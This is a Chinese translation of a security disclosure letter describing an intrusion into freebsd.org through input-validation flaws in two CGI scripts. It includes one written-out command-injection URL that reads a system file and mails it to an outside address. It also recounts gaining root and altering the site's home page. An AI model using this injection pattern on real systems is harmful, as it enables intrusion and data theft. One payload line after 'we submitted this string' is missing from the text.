各位亲爱的安全界的朋友们,
正如你们可能注意到的那样,Frank和我发现了freebsd.org上的一点小小的安全问题。我们发现一个CGI脚本程序dosendptr.cgi对其gndb参数没有进行正确的检查,所以我们可以通过构造一个精巧的字符串来获取想要的任何文件。
这本来不是一个十分严重的问题,但是后来我们又发现另外一个CGI程序getmsg.cgi没有对其fetch参数进行正确的输入检查。而这个参数的输入变量被传递给open()系统调用。
getmsg.cgi中的漏洞是相当严重的,它允许我们传递任意字符串(例如 ;/usr/bin/id| )给CGI程序并打开它。(译者注:如果在文件名后加上‘|’,open()函数就会去执行它,而不是打开)但是还有两个问题:
1.输入需用空格分开;
2.getmsg.cgi运行于taint模式;
第一个限制容易克服,我们用TABS代替空格来分开输入命令。所以我们只需要提交下面这样的字符串就行:
getmsg.cgi?fetch=one+two+;/bin/cat%09/etc/ftsab%09|mail%09nohican\@niets.org|+four
但是这样还是不能成功,因为getmsg.cgi运行于perl的taint模式。(译者注:taint模式是PERL的一种内置安全检查模式,在perl文件开头使用-T参数就可以使程序运行于这种模式,即#!/usr/local/bin/perl -T。当程序以taint模式运行时,提交给程序的外部的变量不能对外部数据产生影响,即提交的参数不能用于eval(),system(),exec(),open()等函数中)
还记得前边提到的第一个dosendptr.cgi的漏洞吗?我们可以使用dosendptr.cgi来间接的调用getmsg.cgi,这样就可以克服perl的taint模式检查。
于是我们提交这样的字符串个服务器:
这样就执行了cat /etc/fstab命令了。
我们已经在freebsd.org上得到了nobody权限,并且我们很快地通过一个已知的/proc/pid/mem文件漏洞
得到了root权限。这个漏洞也是我们发现的,后面会介绍它。
请注意,我们没有任何不良的意图,也没有试图通过修改日志来隐藏我们的发现。我们所做的仅仅是在
hup.freebsd.org上增加了一个额外的规则来重写URL。并且修改了http://www.freebsd.org上的index.html文件,给Kris留了一条信息,原始的index.html文件保存在相同的目录下。
Kris,祝你在新工作中交好运,如果我们能帮忙的话,请告知我们。(译者注:Kris是freebsd.org的安全官员)
Kind regards,
Joost Pol aka Nohican
Frank Van Vliet aka {}
翻译:isno